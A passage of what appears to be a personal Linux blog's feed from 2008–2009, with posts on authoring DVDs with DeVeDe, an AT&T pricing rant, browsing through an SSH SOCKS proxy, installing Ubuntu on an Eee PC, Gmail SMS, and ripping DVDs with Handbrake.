the sub file. There are also a number of very useful advanced settings
that you can mess around with if you feel so inclined&amp;nbsp; (default settings
have worked for me though). Before you finish, I would advise clicking
the Preview button as well. It will encode a sample of the video with
your settings and play it back so that you can preview what the DVD will
look like when finished, and to make sure everything is in sync (very
handy feature!).&amp;nbsp; Once you are satisfied with your settings, simply
click OK.&lt;/p&gt;
&lt;p&gt;Now, you need to configure your menu. For me, I really don't care what
the menu looks like, so I just leave the default in. However, I'm sure
there are many out there who don't share my thoughts, and would like to
customize away. If so, simply click the Menu Options button at the
bottom of the home screen.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-menu-devede.png"&gt;&lt;img alt="Menu Options - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-menu-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;From here, you can make pretty much any change you want to. Add music,
add a custom background, title the Menu, change the font, everything. I
won't go through this in depth, but you can play around with it and see
what happens! You can also preview the menu from here, so you can see
what it looks like as you're making it.&lt;/p&gt;
&lt;p&gt;You're almost done now! The last thing you need to check is under the
Advanced Options tab at the bottom. If you have a multicore CPU, I would
advise selecting the Use Optimizations For Multicore CPUs option. This
will greatly speed up your disc creation time. Once you've checked this,
go ahead and click Forward.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-final-disc-structure-devede.png"&gt;&lt;img alt="Final Disc Structure - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-final-disc-structure-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You will now be prompted with where to save the ISO image of the DVD. An
ISO image, for those who don't know, is basically a bit for bit copy of
a DVD, and we will use it to actually burn our DVD.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-saveiso-devede.png"&gt;&lt;img alt="Save ISO - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-saveiso-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Once done, just click OK and go get a cup of coffee. It will be a little
while, as DeVeDe needs to encode your video into the proper format.&lt;/p&gt;
&lt;p&gt;After it finishes, get a DVD and insert it into your DVD burner. Open up
the folder where you saved the ISO, double click the file (right
click-&amp;gt;Disk Burner on Jaunty), and click Burn. Wait for it to finish,
and then you're done! Go plug it into any DVD player, and it should work
like any other disc.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-image-burning-setup.png"&gt;&lt;img alt="Image Burning" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-image-burning-setup.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And that's it! I hope this was helpful to some of you out there
wondering how to create DVDs in Ubuntu, feel free to ask if you need
help or clarification.&lt;/p&gt;
</summary><category term="devede"></category><category term="dvds"></category><category term="encoding"></category><category term="linux"></category><category term="ripping"></category><category term="Ubuntu"></category></entry><entry><title>The AT&amp;T Debacle - A Cautionary Tale</title><link href="https://spareclockcycles.org/2009/04/12/att-a-cautionary-tale.html" rel="alternate"></link><updated>2009-04-12T15:51:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-12:2009/04/12/att-a-cautionary-tale.html</id><summary type="html">&lt;p&gt;A few days ago, &lt;a class="reference external" href="http://gigaom.com/2009/04/09/time-warner-offers-more-pricing-options-to-sweeten-its-tiers/"&gt;AT&amp;amp;T announced the specifics on a trial of their new
pricing program&lt;/a&gt;, and, in true AT&amp;amp;T fashion,&amp;nbsp; continued their rape the
American consumer in another attempt to keep us in their profitable
technological dark age. I suppose that may be a little harsh, but hey, I
am not so happy right now. I'm sure you will forgive me my moment of
rage. So what is their new, creative pricing plan? Make you pay more (a
lot more, of course) to get the service you have today.&lt;/p&gt;
&lt;p&gt;Apparently, AT&amp;amp;T has decided that they are tired of people's access to
&amp;quot;unlimited&amp;quot; broadband services (godless freeloaders), so they have
decided to start running trials in which users are charged by the
gigabyte for Internet access. What this essentially means is that
without any discernible increase in the cost of providing their service,
they have taken it upon themselves to greatly increase the cost of their
service to the average consumer. To get the same unlimited access that
you're paying 20-35 dollars a month for now, you will have to pay (at
least) 150 dollars to AT&amp;amp;T for in the future. Let me repeat that: AT&amp;amp;T
is implementing a 500% price hike for no apparent reason. Well, other
than greed, that is.&lt;/p&gt;
&lt;p&gt;Now, to be fair, AT&amp;amp;T has put forth a few arguments on why this price
hike is necessary. The first and foremost among these arguments is that
people are actually using the bandwidth that they paid for. &lt;a class="reference external" href="http://arstechnica.com/old/content/2008/12/sorry-beaumont-att-brings-bandwidth-caps-to-texas.ars"&gt;And they
can't have that&lt;/a&gt;. They first tried to bump up their profit margins
again by trying to &lt;a class="reference external" href="http://www.pcworld.com/article/155076/google_bandwidth_hog.html?tk=rss_news"&gt;force web companies like Google and Yahoo to pay
more for all of their web traffic to be prioritized&lt;/a&gt;, a potentially
disastrous proposal for the internet as a whole, and a definitive death
blow to the cause of net neutrality. Unfortunately, the do-nothing
attitude of &lt;a class="reference external" href="http://www.vnunet.com/vnunet/news/2153682/rejects-net-neutrality-bill"&gt;Congress rejected the net neutrality bill that would have
prevented such a thing from taking place&lt;/a&gt;, but at least Congress
restrained itself from making the telecom's brilliant idea law. Because
of this setback, the AT&amp;amp;T and the telecoms were forced to go back to the
drawing board. Looks like they've decided that if they can't take from
the provider side, they're going to take from the consumer. And they
want it all.&lt;/p&gt;
&lt;p&gt;The second most quoted reason for the price hike is much more sickening,
however. AT&amp;amp;T has gone around proudly declaring that they need the money
to keep pace with technological innovation, so as to continue to provide
their customers with &amp;quot;superior service.&amp;quot; Hrm...you mean like the &lt;a class="reference external" href="http://www.newnetworks.com/BroadbandScandalIntro.htm"&gt;$200
billion dollars in taxpayer money you and your telecom buddies were
given back in the 90's to achieve the goal of 86 million U.S. homes with
symmetrical 46mbps internet connections by 2006?&lt;/a&gt; Or was that not quite
enough for you? While they've sat counting the money they robbed from
the American people, we have quickly slid from &lt;a class="reference external" href="http://www.websiteoptimization.com/bw/0704/"&gt;1st worldwide in
broadband penetration to 25th&lt;/a&gt;. And please, spare me the &amp;quot;we're too
large of a country, Japan has it so easy&amp;quot; rhetoric. In case you didn't
realize, Japan is a country&amp;nbsp; about the size of California, and I don't
think that ANY Californians have yet to be blessed with the 100mbit/s
internet connections that most Japanese citizens enjoy. Oh, and telecom
companies? &lt;a class="reference external" href="http://www.newnetworks.com/scandalquotes.htm"&gt;I'm still waiting for my $2000 refund check (or, preferably,
my faster internet connection)&lt;/a&gt;. And don't think I'll forget.&lt;/p&gt;
&lt;p&gt;Their third line of reasoning is just silly. AT&amp;amp;T argues that because it
worked in Europe (an arguable point) and on cell phones (a ridiculous
point), it should now be the rule rather than the exception. I can't
help but wonder at how they decided that Europeans liked paying more for
their internet connections. My guess is that their definition of
&amp;quot;worked&amp;quot; is that people didn't storm their corporate offices with
pitchforks. Well, either that or the entire continent is comprised of
masochists. You can decide which is the more likely scenario. But
believe me, if I or any of my friends could have an unlimited 3G
connection that didn't cost an arm and a leg, we would subscribe in a
heartbeat. However, providers just will not do that, regardless of the
MASSIVE consumer interest in such a service. Why? They make more money
per kilobyte when they charge by the kilobyte than when they give people
an unlimited pass. It has nothing to do with need, or an increase in
traffic, or a better way of thinking about providing internet service
for consumers. It is about them padding their already enormous profits
with more of your hard earned money.&lt;/p&gt;
&lt;p&gt;I mentioned in the title of this post that this was a cautionary tale. I
want to clarify what I mean by that. First, I want to caution the
American people: if we continue to let the large corporations in this
country dictate the progress of technological innovation for their own
gain, we will fall further and further behind the rest of the world.
Technology, with all its benefits, has made this country the great place
that it is, and to let that slip away for the short-term profit of a
wealthy few would be one of the worst decisions that we could make. The
hard economic times that we are now in would devolve into something much
worse without our technological upper-hand. Second, I want to caution
the telecom companies, specifically AT&amp;amp;T: be careful on the ground on
which you tread. You've already been lucky so far that the U.S.
government has not taken action against you for your monopolistic
business practices now and your blatant fraud back in the 90's.&amp;nbsp; Price
gouging your customers to the point of ridiculousness while
simultaneously stealing their tax dollars is not going to win you any
friends. Eventually, your misdeeds and lies will come into the public
light (probably after you pushed peoples' pocketbooks just a bit too
far), and people will be calling for heads to roll. When that happens,
you're going to need all the friends you can get.&lt;/p&gt;
&lt;p&gt;&amp;lt;/rant&amp;gt;&lt;/p&gt;
</summary><category term="at&amp;amp;t"></category><category term="internet"></category><category term="netneutrality"></category><category term="outrage"></category><category term="rant"></category><category term="telecoms"></category></entry><entry><title>SSH: Secure Browsing Via SOCKS Proxy</title><link href="https://spareclockcycles.org/2009/04/10/ssh-secure-browsing-via-socks-proxy.html" rel="alternate"></link><updated>2009-04-10T17:41:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/ssh-secure-browsing-via-socks-proxy.html</id><summary type="html">&lt;p&gt;It seems that not a week goes by any more that I don't find some new,
fun trick to do with SSH. A few weeks ago, I found one that to me has
been especially useful.&lt;/p&gt;
&lt;p&gt;I was sitting in the Tulsa International Airport, once again wishing
that airports would just suck it up and provide free wireless access
throughout their terminals. It's a real pet peeve of mine, as layovers
become incredibly more painful when I can't waste away my time stumbling
about the internet. I might even have to do something *shudder*
productive...&lt;/p&gt;
&lt;p&gt;Anyway, there I was, sipping some coffee and working on a project, when
I noticed that there was an open wireless network available that was not
one of those god forsaken &lt;a class="reference external" href="http://www.airportwifiguide.com/for-free-airport-wifisee-this-boingoiphone-free-wifi-hack-for-laptop-users/"&gt;Boingo hotspots&lt;/a&gt;. Being the curious person
that I am, I decided to see if I could connect. Sure enough, it let me
right on. Being the cautious person I am, I went to an HTTPS secured
site to see what would happen. And sure enough, the normally valid
certificate was invalid, pretty much guaranteeing someone was trying to
listen in.&amp;nbsp; I was still happy though, at least I still I had internet
access and could keep myself mildly entertained with that.&lt;/p&gt;
&lt;p&gt;However, I was feeling especially curious that day, so I decided to try
to tunnel my traffic over SSH to a box back in my apartment, keeping my
oh-so precious personal data away from prying eyes. Besides, beats
working. After a little digging through man pages, this task, to my
surprise, turned out to be much simpler than I had expected. All you
need is one SSH command and an SSH server that you have access to and
has forwarding enabled (the default OpenSSH installation on Ubuntu
does).&lt;/p&gt;
&lt;p&gt;If you don't have an SSH server set up and you're using Ubuntu at home,
simply execute this on your home machine:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install openssh-server
&lt;/pre&gt;
&lt;p&gt;This will install and start the service. Make sure that a.) your user
password is of &lt;a class="reference external" href="http://www.passwordmeter.com/"&gt;decent strength&lt;/a&gt; (SSH is a common target for password
bruteforcing) and b.) that you have port 22 forwarded on your router if
you are behind a NAT so that you can access it from outside of your
local network. The SSH client should already be installed on a default
Ubuntu install (you can also &lt;a class="reference external" href="http://www.jonlee.ca/how-to-secure-your-traffic-using-an-ssh-tunnel-with-putty/"&gt;do this using PuTTY on windows&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Once you have these two things ready, just open up terminal on your
laptop/netbook/mobile device and type the following:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
ssh -Nf -D randPortNum remote-username&amp;#64;ssh.server.com
&lt;/pre&gt;
&lt;p&gt;Replace randPortNum with a port number of your choosing (something above
1024 if you are not root, which is probable), remote-username with your
username on the remote system, and ssh.server.com with the hostname or
IP address of your SSH server. If you are using your home server, I'd
suggest using &lt;a class="reference external" href="http://www.dyndns.com/"&gt;DynDNS&lt;/a&gt; to get a simple domain name to access it with.
If you do not feel very comfortable with the command line, or you are
lazy like me (I hate having to close the window after I'm done...), you
can execute this command using Alt+F2, and the SSH client will prompt
you for your password.&lt;/p&gt;
&lt;p&gt;Now let me explain what exactly this command is doing. The N and f flags
both specify that the command is to be forked into the background, so
that you can do whatever you want after you execute it. Close the
terminal, keep using it for something else, anything you please (just
not killall ssh!). The D flag is the one doing the really interesting
stuff: the OpenSSH developers decided it would be cool to put SOCKS
proxy functionality straight into the client, and the D flag is how you
access it. Basically, you are just telling SSH to start &amp;quot;local dynamic
application-level port forwarding&amp;quot; (SOCKS proxy) from the specified port
on your local machine to the remote host. Now, any program on your
computer that supports SOCKS proxies will be able to connect to that
port on your machine and have its traffic automagically forwarded (and
encrypted!) across the internet to your remote machine, where it will
then go out to its destination.&lt;/p&gt;
&lt;p&gt;To add to it, tons of programs do support SOCKS proxies, more than you
might think. Firefox, Opera, Pidgin, Deluge, Transmission (Tracker
only), the list goes on. On top of that, using some programs (like
&lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt;) you can actually use any TCP based program over it. Very cool
stuff.&lt;/p&gt;
&lt;p&gt;To go ahead and encrypt your web traffic, open up Firefox (if you need
Opera instructions, they're probably very similar).&amp;nbsp; Go to
Edit-&amp;gt;Preferences-&amp;gt;Advanced-&amp;gt;Network-&amp;gt;Settings (Configure How Firefox
Connects To The Internet) . Select &amp;quot;Manual proxy configuration&amp;quot;, enter
&amp;quot;localhost&amp;quot; for your SOCKS host and the port number you chose earlier as
your port. Either SOCKS 4 or 5 should work (I use 5). Now, it should
look similar to the picture below:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-connection-settings.png"&gt;&lt;img alt="An Example Configuration" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-connection-settings.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now just click OK, close out the Settings dialog, and you're done! &lt;a class="reference external" href="http://checker.samair.ru/"&gt;Go
here&lt;/a&gt; and check it out, your IP is now the same as the remote host's.
If you're really paranoid, you can also make Firefox tunnel your DNS
queries over the proxy. This prevents the nameserver of the local
network feeding you bad DNS information or keeping tabs on what you are
viewing (you are still relying on the remote nameserver being
trustworthy though :P) . To do this, open up a tab, enter the address
&amp;quot;&lt;a class="reference external" href="about:config"&gt;about:config&lt;/a&gt;&amp;quot;, search for &amp;quot;network.proxy.socks_remote_dns&amp;quot; and set it
to true. And that's it!&lt;/p&gt;
&lt;p&gt;This trick can be immensely useful in many situations, from securing
your traffic across untrusted local networks, to getting around packet
shaping/filtering, to remaining anonymous online. I now use it all the
time on my laptop, and very rarely trust the local network. A word of
warning before I sign off though, I was lucky on that hotspot because
the attacker was not trying to launch a MITM attack against my SSH
traffic. If they had, the keys would not have matched my previous
connection attempts to my SSH server, and I would have been warned in
big bold letters that I was being listened in on, and the SSH client
would have quit. In this situation, securing your traffic may be more
difficult, but not impossible. I may post later on how one might go
about this.&lt;/p&gt;
&lt;p&gt;Anyway, hope someone else finds this as useful and interesting as I do.
As always, feel free to ask if you have any questions.&lt;/p&gt;
&lt;p&gt;UPDATE 04/15/2010: I have done a &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/15/socksify-anything/"&gt;follow-up post&lt;/a&gt; to this article
describing how you can use proxychains to allow any program that uses
TCP sockets to tunnel traffic over SOCKS proxies, not just ones that
have built-in proxy support. I also show how to chain multiple proxies
together.&lt;/p&gt;
</summary><category term="anonymity"></category><category term="firefox"></category><category term="socks"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Ubuntu 8.10 on the Eee PC 1000</title><link href="https://spareclockcycles.org/2009/04/10/ubuntu-810-on-the-eee-pc-1000.html" rel="alternate"></link><updated>2009-04-10T03:42:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/ubuntu-810-on-the-eee-pc-1000.html</id><summary type="html">&lt;p&gt;Wow, you know you haven't posted in awhile when your intro paragraph to
your next post talks about how Christmas went. In case anyone still
cares now that it's almost Easter, it went well. Very well. I still want
to take this time to thank Santa for his enormous generosity this past
year, as he was kind enough to get me that netbook that had been dancing
around in my dreams for awhile: the Eee PC 1000.&lt;/p&gt;
&lt;p&gt;I've spent the past few months playing around with my shiny new Eee PC,
and I am duly impressed. Wireless N,&amp;nbsp; 8GB SSD + 32GB built in flash, 7
(yes, count them, 7) hours of battery life, Bluetooth, webcam + mic, the
list goes on and on. All of this technological goodness kept within a
sleek, 12 inch wide frame that even Steve Jobs might not deem &amp;quot;junk&amp;quot;.
Oh, and did I mention that all of this wonderful hardware has native
Linux driver support? Can you say &amp;quot;portable hackstation&amp;quot;?&lt;/p&gt;
&lt;p&gt;Yes, it was a good Christmas for this Linux user, and judging from the
experience I had with the Eee PC 1000, it's been a good year for Linux
users in general. With netbooks being the fastest growing segments in
the computing arena,&amp;nbsp; Linux's superior memory and power management,
combined with it's endless configurability and ever-improving
usability,&amp;nbsp; is starting to make Microsoft fear the penguin more than
usual. This is not without reason: Ubuntu 8.10 has completed my netbook.&lt;/p&gt;
&lt;p&gt;Now, before you all cry out in unison that I can get netbooks with Linux
preinstalled, I know. In fact, mine came that way. However, the
distribution that shipped with my Eee PC made it feel less like a
computer and more like a toy, and a very useless one at that. I really
hope that Asus wises up, and starts shipping something that isn't
intentionally crippled for some miguided notion of&amp;nbsp; usability. I am
thoroughly convinced that an install of Ubuntu would have been easier to
use for anyone than that worthless POS that came preinstalled.&lt;/p&gt;
&lt;p&gt;However, as great of a fit that the Ubuntu/Eee PC union is, it was not
without some small hurdles to first overcome. The following is a short
documentation of how to take your nifty new Eee PC and install the
latest release of Ubuntu, Intrepid Ibex.&lt;/p&gt;
&lt;p&gt;As I'm sure you've figured out, installing from CD isn't going to work
so well without a CD drive, so we first need to find another way to get
Ubuntu onto the netbook. The easiest way to do this is with a flash
drive. These are many ways to get Ubuntu on a flash drive, as documented
&lt;a class="reference external" href="https://help.ubuntu.com/community/Installation/FromUSBStick"&gt;here&lt;/a&gt;, but I will only be covering how I did it, using the
installation tool built into Ubuntu. If you don't have a flash drive,
well, buy one. Seriously, it's like 5 bucks.&lt;/p&gt;
&lt;p&gt;Once you've gotten a hold of a flash drive, make sure you've backed up
any important files, because we're going to wipe it and put Ubuntu onto
it.&amp;nbsp; You are also going to need to get an ISO of the latest version of
Ubuntu 8.10 (32 bit) from &lt;a class="reference external" href="http://www.ubuntu.com/getubuntu/download"&gt;here.&lt;/a&gt; While that's downloading, you might
run off and get an ethernet cable if you don't have it, you'll need it
later.&lt;/p&gt;
&lt;p&gt;It should be mentioned at this point that there are lots of ready-made
distros out there specifically for the Eee PC, including a number based
off of Ubuntu. In addition, a default installation of Ubuntu does not
have driver support enabled for all of the Eee PC components. However,
these ready-made distributions strip out a lot of kernel features that
you may need at some point, so for most users it's a better idea to just
install the standard edition and install a custom kernel. After all, it
would be rather annoying if, for all the Eee PCs portable goodness, you
plugged in some device that normally works under a standard Ubuntu 8.10
install only to find out that support for it has been removed. It's
better to at least have a backup of the original kernel, with all of its
driver support, and then run a slimmed down version with the Eee PC
drivers compiled in for day to day use. Now, I know what you're thinking
to yourself right now: &amp;quot;I have to replace my kernel just to get this
working? What is this, Gentoo?&amp;quot; Do not fear, the Ubuntu community has
your back, and has made this process a piece of cake.&lt;/p&gt;
&lt;p&gt;Now that you have the ISO downloaded, we can move on to the fun part -
installing it on a USB drive. If you already have Ubuntu installed on
your desktop/laptop, then you're all set to start. If not, you need to
burn the ISO to a CD, and then boot into it before you can start. Once
you have Ubuntu up and running, go to System -&amp;gt; Administration -&amp;gt; Create
A USB Startup Disk. This will look slightly different on the Live CD, as
you don't have to select an ISO (it uses itself), but the concept is the
same:&lt;/p&gt;
&lt;p&gt;Now, simply select the ISO file that you downloaded, the USB drive that
you want to install, and click &amp;quot;Make Startup Disk&amp;quot;. Go get yourself
something to eat, as this can take awhile, depending on the speed of the
disk.&lt;/p&gt;
&lt;p&gt;You should now have a bootable USB drive with Ubuntu 8.10 installed,
congratualtions! You're well on our way to having it up and running.
Now, go ahead plug it into your Eee PC and power it up. You may need to
set the USB drive as the default boot device in the BIOS, so it's best
to check. F2 at the bootup screen does the trick. For some reason, my
Eee PC reports USB drives as hard drives, so I would check to make sure
that USB is first in the Hard Disk boot priority list.&lt;/p&gt;
&lt;p&gt;Once you've booted up into Ubuntu using the USB drive, simply install
Ubuntu as you normally would, by clicking the Install icon on the
desktop and following the prompts. Make sure that your 8GB partition is
the one that your root&amp;nbsp; partition is installed to, not doing so will
result in slow performance and possibly data loss later on.&lt;/p&gt;
&lt;p&gt;Restart, and you're almost done! Hook up your Eee PC to a wired
connection (your wireless most likely won't work), and follow &lt;a class="reference external" href="http://array.org/ubuntu/setup-intrepid.html"&gt;these
instructions&lt;/a&gt; to install the custom Eee kernel.&lt;/p&gt;
&lt;p&gt;That's it! I hope you all have found this informative, and I know you
will all enjoy Ubuntu on your Eee PC as much as I have.&lt;/p&gt;
&lt;p&gt;If you want some tips on configuring your Ubuntu install to deal with
the small screen, please see &lt;a class="reference external" href="https://help.ubuntu.com/community/EeePC/Using"&gt;the Ubuntu wiki&lt;/a&gt;. Its tips really helped
me, and I'm sure they will be of use to all of you as well.&lt;/p&gt;
</summary><category term="8.10"></category><category term="eeepc"></category><category term="intrepid"></category><category term="Ubuntu"></category></entry><entry><title>Compulsive Slashdot Reading</title><link href="https://spareclockcycles.org/2009/04/10/compulsive-slashdot-reading.html" rel="alternate"></link><updated>2009-04-10T01:52:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-10:2009/04/10/compulsive-slashdot-reading.html</id><summary type="html">&lt;p&gt;And they said it would never pay off...:P . But in all seriousness,
welcome to all who have now blindly stumbled upon my tiny blog in the
middle of the vast sea of cyberspace. Because of the copious amounts of
schoolwork and research I've had on my plate the past few months, I
haven't set nearly enough time aside to update this blog. This saddens
me greatly, so I'm going to begin a renewed effort to start posting my
musings concerning technology and such again, and hopefully some of you
might be able to glean a few pieces of advice and wisdom out of my
incessant babbling. Now for something to write about... I guess I'll
have to see what sets my fingers typing next.&lt;/p&gt;
&lt;p&gt;Until then, peace.&lt;/p&gt;
</summary></entry><entry><title>Google Releases Free Texting Feature</title><link href="https://spareclockcycles.org/2008/12/21/google-releases-free-texting-feature.html" rel="alternate"></link><updated>2008-12-21T01:27:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-21:2008/12/21/google-releases-free-texting-feature.html</id><summary type="html">&lt;p&gt;I have to say, I heard about this one coming a few weeks ago and I was
quite excited. And now it's here! Google didn't disappoint either.&lt;/p&gt;
&lt;p&gt;Google's texting service has pretty much everything I had hoped for,
delivered of course with their trademark simplicity. Text messages are
sent the same way as chats, simply find the person in your contacts list
and, if you have their number stored, select &amp;quot;Send SMS&amp;quot;. Then just type
your message, press enter, and off it goes.&lt;/p&gt;
&lt;p&gt;In my tests, the messages were all delivered promptly, very little
delay. This is a very big plus, as many other free services are slower
than Han Solo post-carbonite. Replies also arrive promptly, making it a
great, cheap way to have text convos with your friends who have more of
a life than you do.&lt;/p&gt;
&lt;p&gt;Oh yeah, did I mention the replies? Google assigns anyone who uses their
service a unique number, meaning that your friends can reply to any free
texts you send, and they get sent straight to your inbox. As I'm on my
computer almost as much as I'm away from it, so it is incredibly
convenient for me to be able to text friends/family from my browser.
And, for those few times that I'm not, it's saved like any other email
or chat message, waiting for me when I return from what was most likely
a bathroom trip.&lt;/p&gt;
&lt;p&gt;I've messed with few free texting services in the past, but most of
those experiences consisted of me reading their TOS page and then
running away quickly. Enter Google. Their strategy to passively gather
information on me and serve me targeted ads in my inbox, while still
more than a little unnerving, is miles better than having someone
constantly spamming my phone with MMS pron.&lt;/p&gt;
&lt;p&gt;Altogether, this is a great new feature, and I really hope that Google
decides to run with it. For all of you wondering how to enable this
handy service, go to Settings -&amp;gt; Labs in Gmail, and simply enable Text
Messaging (SMS) in Chat.&amp;nbsp; I hope everyone finds this as useful as I
have!&lt;/p&gt;
&lt;p&gt;N.B. I am not actually a Google marketing person, as much as I may sound
like one in this post. I was excited, give me a break:P&lt;/p&gt;
</summary><category term="awesome"></category><category term="gmail"></category><category term="Google"></category><category term="texting"></category></entry><entry><title>Handbrake 0.9.3 - DVD Ripping on Ubuntu</title><link href="https://spareclockcycles.org/2008/12/11/handbrake-for-dvd-ripping-on-ubuntu.html" rel="alternate"></link><updated>2008-12-11T01:50:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2008-12-11:2008/12/11/handbrake-for-dvd-ripping-on-ubuntu.html</id><summary type="html">&lt;p&gt;As most of my friends can attest, I am very big on making backups of my
DVDs, so much so that I rarely pull them out of their case except to
make rips of them. I tend to break/scratch discs like none other, so I
make it a point to have backups. I am very hard to please when it comes
to ripping programs, as I both want to be able to tweak advanced
settings to my liking, but also to just be able to throw something in
and go. Needless to say, I want the rips to be high quality. I generally
use x264 video and AC3 audio muxed into an MKV container, and I've found
this to be a very good combination. I have tried pretty much every tool
that I can find out there to do this for me: dvd::rip, OGMRip, and
acidrip to name a few, but have still always fallen back to using a
collection of custom CLI scripts that I put together to rip and encode
them automatically. I've even toyed around with the idea of creating my
own GUI, to attempt to fill a rather gaping void of decent ripping
programs, but unfortunately not had the time.&lt;/p&gt;
&lt;p&gt;Thankfully, this will no longer be necessary. I have just tested the
latest &lt;a class="reference external" href="http://handbrake.fr/"&gt;Handbrake&lt;/a&gt; release for Linux, and I have to say, these guys
have outdone themselves. When I last tried Handbrake, it was simply a
CLI version on Linux, and a rather bad one at that. My direct mencoder
invocations consistently performed better than their command line
program's calls, a reason alone to move on. Beyond that, it was just
hard to use, and if I was doing command line, I might as well just use
mencoder. Not so anymore with the release of their latest GUI. It's a
GTK frontend, which really does make encoding as simple as point and
click. Now Handbrake has long been a favorite on Windows, so this may
not come as a surprise to some, but I really was not expecting this kind
of release for Linux from them. Kudos.&lt;/p&gt;
&lt;p&gt;The following is a short tutorial on how to set up and use the new
Handbrake GUI on Ubuntu:&lt;/p&gt;
&lt;p&gt;Some people in Ubuntu forums have thankfully set up a PPA repository of
Handbrake to make it easier to install. To install Handbrake on Ubuntu
do the following:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
gksudo gedit /etc/apt/sources.list
&lt;/pre&gt;
&lt;p&gt;Now, you need to copy the lines below into it. If you are on Intrepid,
change &amp;quot;hardy&amp;quot; to &amp;quot;intrepid&amp;quot;.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
deb http://ppa.launchpad.net/handbrake-ubuntu/ubuntu hardy main
deb-src http://ppa.launchpad.net/handbrake-ubuntu/ubuntu hardy main
&lt;/pre&gt;
&lt;p&gt;Once you're done, save and close. Now, reload your repositories and
install handbrake:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get update
sudo apt-get install handbrake-gtk
&lt;/pre&gt;
&lt;p&gt;Now Handbrake should be installed. If you're going to be ripping DVD's,
this tutorial assumes that you have libdvdcss installed. You can grab it
off of &lt;a class="reference external" href="https://help.ubuntu.com/community/Medibuntu"&gt;Medibuntu&lt;/a&gt; (help.ubuntu.com) if you don't. Go to the Sound and
Video tab in your menu, and select Handbrake. Alternately, you can just
type &amp;quot;ghb&amp;quot; into the command line to start up the GUI. If you are having
problems that you need to debug, this may be useful as well. Now you
should see the following screen:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-1.png"&gt;&lt;img alt="Main Menu" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, the GUI is laid out pretty simply. A number of pre-made
profiles are there for your convenience on the right side, with profiles
for everything from iPods to movies to Xbox 360s. To begin your rip,
insert a DVD. Click the Source button and just select the DVD drive that
you've put the disc into.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-select-source1.png"&gt;&lt;img alt="Handbrake - Select Source" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-select-source1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Check to make sure that the correct title that you want was selected,
there should be a preview at the bottom. It seems to just select the
longest title available. If it is not the one you want, simply select
what title/chapters you wish to rip to your file. If you want to rip
something such as a TV show season (meaning you want seperate files for
each episode), you will need to add each title to the queue individually
AFAIK.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-5.png"&gt;&lt;img alt="Handbrake Title Selection" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-5.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Choose where you want to save this file. Then, select the file container
you want. I personally would recommend the &lt;a class="reference external" href="http://www.matroska.org/"&gt;MKV format&lt;/a&gt;, as an open
source and completely free container, but depending on what you are
using your rip for you may not be able to do this. Regardless, there are
plenty of options for your container.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-2.png"&gt;&lt;img alt="screenshot-handbrake-2" src="http://spareclockcycles.files.wordpress.com/2008/12/screenshot-handbrake-2.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;All that's left now is to change the video/audio encoding settings to
your liking. You can essentially configure this as much or as little as
you'd like to. If you want subtitles included, make sure that the proper
ones are selected in the Audio/Subtitles tab. For me, making rips of
DVDs is perfectly managed by the High Profile -&amp;gt; Film profile, with a
few small tweaks. One thing I would recommend doing is setting your
bitrate/final file size in the video tab. I usually go for a 1.4GB file
when using h.264 + AC3 5.1 , but again, I go for high quality, you would
be perfectly fine going with something lower.&lt;/p&gt;
